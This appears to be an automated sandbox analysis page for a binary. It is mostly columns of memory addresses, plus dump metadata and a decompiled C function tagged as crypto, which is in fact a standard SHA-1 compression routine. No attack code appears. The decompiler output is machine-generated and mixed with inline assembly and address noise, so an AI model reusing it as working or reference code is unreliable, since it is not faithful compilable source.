                                            0x00c46d52
                                            0x00c46d52
                                            0x00c46d58
                                            0x00c46d5b
                                            0x00c46d5d
                                            0x00c46d61
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46d61
                                            0x00c46d52
                                            0x00c47209
                                            0x00c4720b
                                            0x00c4720e
                                            0x00c47211
                                            0x00000000
                                            0x00000000
                                            0x00c4721a
                                            0x00c4721d
                                            0x00c47220
                                            0x00c47223
                                            0x00000000
                                            0x00000000
                                            0x00c4722c
                                            0x00c4722f
                                            0x00c47232
                                            0x00c47235
                                            0x00000000
                                            0x00000000
                                            0x00c4723e
                                            0x00c47241
                                            0x00c47244
                                            0x00c47247
                                            0x00000000
                                            0x00000000
                                            0x00c47250
                                            0x00c47253
                                            0x00c47256
                                            0x00c47259
                                            0x00000000
                                            0x00000000
                                            0x00c47262
                                            0x00c47265
                                            0x00c47269
                                            0x00c4726c
                                            0x00c4726f
                                            0x00c47278
                                            0x00c4727b
                                            0x00c4727b
                                            0x00000000
                                            0x00c4726f
                                            0x00c475cf
                                            0x00c475cf
                                            0x00c475d2
                                            0x00c475d6
                                            0x00c475d8
                                            0x00c475dc
                                            0x00c475e1
                                            0x00c475e5
                                            0x00c475e8
                                            0x00c475eb
                                            0x00c475ee
                                            0x00c475f1
                                            0x00c475f5
                                            0x00c475f5
                                            0x00c475f5
                                            0x00c471f7
                                            0x00c471f7
                                            0x00000000
                                            0x00c471f7
                                            0x00c47574
                                            0x00c47577
                                            0x00000000
                                            0x00000000
                                            0x00c4757f
                                            0x00c4757f
                                            0x00c47582
                                            0x00c47585
                                            0x00c47588
                                            0x00c4758d
                                            0x00c47593
                                            0x00c47599
                                            0x00c4759f
                                            0x00c475a5
                                            0x00c475ab
                                            0x00c475ae
                                            0x00c475b1
                                            0x00c475b4
                                            0x00c475b7
                                            0x00c475ba
                                            0x00c475ba
                                            0x00c475ba
                                            0x00000000
                                            0x00c475bf
                                            0x00c4754b
                                            0x00c4749b
                                            0x00c4749e
                                            0x00c4749e
                                            0x00c474a0
                                            0x00000000
                                            0x00000000
                                            0x00c474a2
                                            0x00c474a3
                                            0x00c474a6
                                            0x00c474a9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c474ab
                                            0x00c474ad
                                            0x00000000
                                            0x00c474ad
                                            0x00c47465
                                            0x00c47468
                                            0x00c47472
                                            0x00c4747a
                                            0x00c47480
                                            0x00c47483
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c47432
                                            0x00c47432
                                            0x00c47435
                                            0x00c47437
                                            0x00c4743a
                                            0x00c4743a
                                            0x00c4743a
                                            0x00000000
                                            0x00c47432
                                            0x00c47308
                                            0x00c4730b
                                            0x00c4730f
                                            0x00c47311
                                            0x00c46e27
                                            0x00c46e27
                                            0x00000000
                                            0x00c46e27
                                            0x00c47317
                                            0x00c4731a
                                            0x00c4731f
                                            0x00c47321
                                            0x00c4732b
                                            0x00c47330
                                            0x00c47332
                                            0x00c473e2
                                            0x00c473e2
                                            0x00c473e5
                                            0x00c473e7
                                            0x00000000
                                            0x00000000
                                            0x00c473ed
                                            0x00c473f3
                                            0x00c473f9
                                            0x00c473fe
                                            0x00c47402
                                            0x00c47408
                                            0x00c47411
                                            0x00c47414
                                            0x00c47414
                                            0x00c47414
                                            0x00000000
                                            0x00c47419
                                            0x00c47338
                                            0x00c4733a
                                            0x00000000
                                            0x00000000
                                            0x00c47340
                                            0x00c47346
                                            0x00c47348
                                            0x00c4734e
                                            0x00c47352
                                            0x00c47355
                                            0x00c47359
                                            0x00c473ab
                                            0x00c473ae
                                            0x00000000
                                            0x00000000
                                            0x00c473b6
                                            0x00c473b6
                                            0x00c473b9
                                            0x00c473bb
                                            0x00c473bf
                                            0x00c473c4
                                            0x00c473c8
                                            0x00c473cb
                                            0x00c473ce
                                            0x00c473d1
                                            0x00c473d4
                                            0x00c473d8
                                            0x00c473d8
                                            0x00c473d8
                                            0x00000000
                                            0x00c473dd
                                            0x00c4735b
                                            0x00c4735e
                                            0x00000000
                                            0x00000000
                                            0x00c47366
                                            0x00c47366
                                            0x00c47369
                                            0x00c4736c
                                            0x00c4736f
                                            0x00c47374
                                            0x00c4737a
                                            0x00c47380
                                            0x00c47386
                                            0x00c4738c
                                            0x00c47392
                                            0x00c47395
                                            0x00c47398
                                            0x00c4739b
                                            0x00c4739e
                                            0x00c473a1
                                            0x00c473a1
                                            0x00c473a1
                                            0x00000000
                                            0x00c473a6
                                            0x00c472cf
                                            0x00c472d3
                                            0x00c472d8
                                            0x00c472da
                                            0x00000000
                                            0x00000000
                                            0x00c472e3
                                            0x00c472e8
                                            0x00c472ea
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c472ea
                                            0x00c46eb1
                                            0x00c46eb7
                                            0x00c46eba
                                            0x00c46ecb
                                            0x00c46ece
                                            0x00c46ece
                                            0x00c46ebc
                                            0x00c46ebc
                                            0x00c46ebc
                                            0x00c46ed0
                                            0x00c46ed3
                                            0x00c46ed5
                                            0x00c46eff
                                            0x00c46ed7
                                            0x00c46ed9
                                            0x00c46ee0
                                            0x00c46ee8
                                            0x00c46eea
                                            0x00c46eec
                                            0x00c46ef4
                                            0x00c46efa
                                            0x00c46efa
                                            0x00c46f04
                                            0x00c46f0b
                                            0x00c46f11
                                            0x00c46f17
                                            0x00c46f1e
                                            0x00c46f4c
                                            0x00c46f4d
                                            0x00c46f4e
                                            0x00c46f50
                                            0x00c46f6c
                                            0x00c46f6f
                                            0x00c46f76
                                            0x00c46f79
                                            0x00c46f7c
                                            0x00c46f88
                                            0x00c46f94
                                            0x00c46f96
                                            0x00c46f9c
                                            0x00c46f9e
                                            0x00c46f9e
                                            0x00c46fa0
                                            0x00000000
                                            0x00c46fa0
                                            0x00c46f58
                                            0x00c46f5b
                                            0x00c46f5b
                                            0x00c46f5d
                                            0x00000000
                                            0x00000000
                                            0x00c46f5f
                                            0x00c46f60
                                            0x00c46f63
                                            0x00c46f66
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46f68
                                            0x00c46f6a
                                            0x00000000
                                            0x00c46f20
                                            0x00c46f22
                                            0x00c46f25
                                            0x00c46f2f
                                            0x00c46f37
                                            0x00c46f3d
                                            0x00c46f40
                                            0x00c46fa8
                                            0x00c46fa8
                                            0x00c46fab
                                            0x00c46fae
                                            0x00c46fbe
                                            0x00c46fc1
                                            0x00c46fc1
                                            0x00c46fb0
                                            0x00c46fb0
                                            0x00c46fb0
                                            0x00c46fc3
                                            0x00c46fc7
                                            0x00c46fca
                                            0x00c46fce
                                            0x00c46fd0
                                            0x00c46fd4
                                            0x00c46fd6
                                            0x00c47107
                                            0x00c47107
                                            0x00c4710d
                                            0x00c4710f
                                            0x00c47110
                                            0x00c47116
                                            0x00c47118
                                            0x00c47119
                                            0x00c4711f
                                            0x00c47121
                                            0x00c47121
                                            0x00c47121
                                            0x00c4711f
                                            0x00c47116
                                            0x00c47125
                                            0x00c4712b
                                            0x00c47131
                                            0x00c47134
                                            0x00c47137
                                            0x00c47142
                                            0x00c47144
                                            0x00c47149
                                            0x00c4714c
                                            0x00c47150
                                            0x00c47152
                                            0x00c47283
                                            0x00c47283
                                            0x00c47287
                                            0x00c4728a
                                            0x00c4728c
                                            0x00000000
                                            0x00000000
                                            0x00c47292
                                            0x00c47298
                                            0x00c4729c
                                            0x00c472a2
                                            0x00c472a7
                                            0x00c472ab
                                            0x00c472b1
                                            0x00c472ba
                                            0x00c472bd
                                            0x00c472bd
                                            0x00c472bd
                                            0x00000000
                                            0x00c47158
                                            0x00c47158
                                            0x00c4715a
                                            0x00000000
                                            0x00000000
                                            0x00c47160
                                            0x00c47166
                                            0x00c47169
                                            0x00c4716f
                                            0x00c47173
                                            0x00c47176
                                            0x00c4717a
                                            0x00c471c5
                                            0x00c471c8
                                            0x00000000
                                            0x00000000
                                            0x00c471cc
                                            0x00c471cc
                                            0x00c471cf
                                            0x00c471d3
                                            0x00c471d5
                                            0x00c471d9
                                            0x00c471de
                                            0x00c471e2
                                            0x00c471e5
                                            0x00c471e8
                                            0x00c471eb
                                            0x00c471ee
                                            0x00c471f2
                                            0x00c471f2
                                            0x00c471f2
                                            0x00000000
                                            0x00c471d5
                                            0x00c4717c
                                            0x00c4717f
                                            0x00000000
                                            0x00000000
                                            0x00c47183
                                            0x00c47183
                                            0x00c47186
                                            0x00c47189
                                            0x00c4718c
                                            0x00c47191
                                            0x00c47197
                                            0x00c4719d
                                            0x00c471a3
                                            0x00c471a9
                                            0x00c471af
                                            0x00c471b2
                                            0x00c471b5
                                            0x00c471b8
                                            0x00c471bb
                                            0x00c471be
                                            0x00c471be
                                            0x00c471be
                                            0x00000000
                                            0x00c471c3
                                            0x00c46fdc
                                            0x00c46fdc
                                            0x00c46fdf
                                            0x00c470da
                                            0x00c470e3
                                            0x00c470ed
                                            0x00c470f1
                                            0x00c470fa
                                            0x00c470fd
                                            0x00c470fd
                                            0x00c47100
                                            0x00c47103
                                            0x00c47103
                                            0x00000000
                                            0x00c47103
                                            0x00c46fe5
                                            0x00c4701b
                                            0x00c46fe7
                                            0x00c46fea
                                            0x00c46fef
                                            0x00c46ff7
                                            0x00c46fff
                                            0x00c47002
                                            0x00c4700a
                                            0x00c47011
                                            0x00c47016
                                            0x00c47016
                                            0x00c47020
                                            0x00c47027
                                            0x00c4702d
                                            0x00c47033
                                            0x00c4703a
                                            0x00c47068
                                            0x00c47069
                                            0x00c4706a
                                            0x00c4706e
                                            0x00c47070
                                            0x00c4708e
                                            0x00c47091
                                            0x00c4709d
                                            0x00c470a0
                                            0x00c470a4
                                            0x00c470a9
                                            0x00c470bc
                                            0x00c470be
                                            0x00c470c4
                                            0x00c470c6
                                            0x00c470c6
                                            0x00c470c8
                                            0x00000000
                                            0x00c470c8
                                            0x00c47078
                                            0x00c4707b
                                            0x00c4707b
                                            0x00c4707d
                                            0x00000000
                                            0x00000000
                                            0x00c4707f
                                            0x00c47080
                                            0x00c47083
                                            0x00c47086
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c47088
                                            0x00c4708a
                                            0x00000000
                                            0x00c4703c
                                            0x00c4703e
                                            0x00c47041
                                            0x00c4704b
                                            0x00c47053
                                            0x00c47059
                                            0x00c4705c
                                            0x00c470d0
                                            0x00c470d3
                                            0x00000000
                                            0x00c470d3
                                            0x00c4703a
                                            0x00c46fd6
                                            0x00c46f1e
                                            0x00c46e97
                                            0x00c46e9a
                                            0x00c46e9a
                                            0x00c46e9a
                                            0x00000000
                                            0x00c46e9a
                                            0x00c46e3b
                                            0x00c46e3e
                                            0x00c46e3e
                                            0x00c46e40
                                            0x00000000
                                            0x00000000
                                            0x00c46e42
                                            0x00c46e43
                                            0x00c46e46
                                            0x00c46e49
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46e4b
                                            0x00c46e4d
                                            0x00000000
                                            0x00c46e4d
                                            0x00c46dfc
                                            0x00c46dff
                                            0x00c46e09
                                            0x00c46e11
                                            0x00c46e17
                                            0x00c46e1a
                                            0x00c46e1d
                                            0x00000000
                                            0x00c46e1d
                                            0x00c46daa
                                            0x00c46dad
                                            0x00000000
                                            0x00000000
                                            0x00c46db1
                                            0x00c46dbc
                                            0x00c46dc2
                                            0x00c4764b
                                            0x00c4764b
                                            0x00000000
                                            0x00c4764b
                                            0x00c46dc8
                                            0x00000000
                                            0x00000000
                                            0x00c46dd0
                                            0x00c46dd6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c46dd6
                                            0x00c46d52
                                            0x00c46d1e
                                            0x00c46cef
                                            0x00c46cf3
                                            0x00c46cf7
                                            0x00c46cfb
                                            0x00c46d03
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                                            • Instruction ID: 03d5a4436aeed8fef833725cabb9f7bb17fbe5ce030f37705a26ca50aa5729f9
                                            • Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                                            • Instruction Fuzzy Hash: E66215706087869FC719CF28C8906B9FBE1FF55304F14866DD8AA8B746D330EA56CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3E973, Relevance: .7, Instructions: 694COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E00C3E973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int _t810;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v28;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E00C4EA80(_t839, _a12, 0x40);
					_t906 =  &(( &_v28)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_a12 = _t848[2];
				_a16 = _t848[3];
				_v24 = 0;
				_t429 = E00C55604( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_a8 =  &(_t839[3]);
				do {
					_t431 = E00C55604(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
					_t436 = E00C55604( *((intOrPtr*)(_a8 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 - 4)) = _t436;
					asm("ror esi, 0x2");
					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
					_t441 = E00C55604( *_a8);
					asm("rol edx, 0x5");
					 *_a8 = _t441;
					asm("ror dword [esp+0x48], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
					_t443 = E00C55604( *((intOrPtr*)(_a8 + 4)));
					_a8 = _a8 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 + 4)) = _t443;
					_t446 = _v24 + 5;
					asm("ror dword [esp+0x48], 0x2");
					_v24 = _t446;
					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00C55604(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
				} while (_v24 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_a16 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
				asm("ror esi, 0x2");
				_a8 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _a16;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_a16 = _t887;
				_t888 = _a8;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_a8 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _a12;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_a12 = _t855;
					_t489 = _v16;
					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _a16;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _a8;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_a8 = _t894;
					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _a12;
					_t810 = _v24;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_a12 = _t842;
					_t243 = _t810 - 0x70e44324; // -1894007573
					_t811 = _v20;
					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
					_v24 = _t897;
					_t898 = _v20;
					_a8 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _a16;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _a8;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_a8 = _t899;
					_t858 = _v4;
					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _a12;
					asm("rol ecx, 0x5");
					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_a12 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x3c], 0x2");
					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _a8;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _a16;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_a8 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
					_v16 = _t816;
					_a12 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}










































































































                                            0x00c3e973
                                            0x00c3e97f
                                            0x00c3e98b
                                            0x00c3e995
                                            0x00c3e99a
                                            0x00c3e99f
                                            0x00c3e981
                                            0x00c3e981
                                            0x00c3e985
                                            0x00c3e985
                                            0x00c3e9a2
                                            0x00c3e9ab
                                            0x00c3e9ad
                                            0x00c3e9b0
                                            0x00c3e9ba
                                            0x00c3e9c0
                                            0x00c3e9c4
                                            0x00c3e9dc
                                            0x00c3e9e7
                                            0x00c3e9e9
                                            0x00c3e9eb
                                            0x00c3e9f0
                                            0x00c3e9f3
                                            0x00c3e9f7
                                            0x00c3e9fb
                                            0x00c3e9fe
                                            0x00c3ea09
                                            0x00c3ea0e
                                            0x00c3ea28
                                            0x00c3ea2d
                                            0x00c3ea38
                                            0x00c3ea45
                                            0x00c3ea4a
                                            0x00c3ea5e
                                            0x00c3ea65
                                            0x00c3ea6f
                                            0x00c3ea7c
                                            0x00c3ea85
                                            0x00c3ea95
                                            0x00c3eaa1
                                            0x00c3eaa3
                                            0x00c3eaae
                                            0x00c3eab3
                                            0x00c3eab6
                                            0x00c3eaca
                                            0x00c3ead1
                                            0x00c3ead8
                                            0x00c3eae1
                                            0x00c3eae5
                                            0x00c3eae9
                                            0x00c3eaf4
                                            0x00c3eaf7
                                            0x00c3eafa
                                            0x00c3eb06
                                            0x00c3eb18
                                            0x00c3eb1b
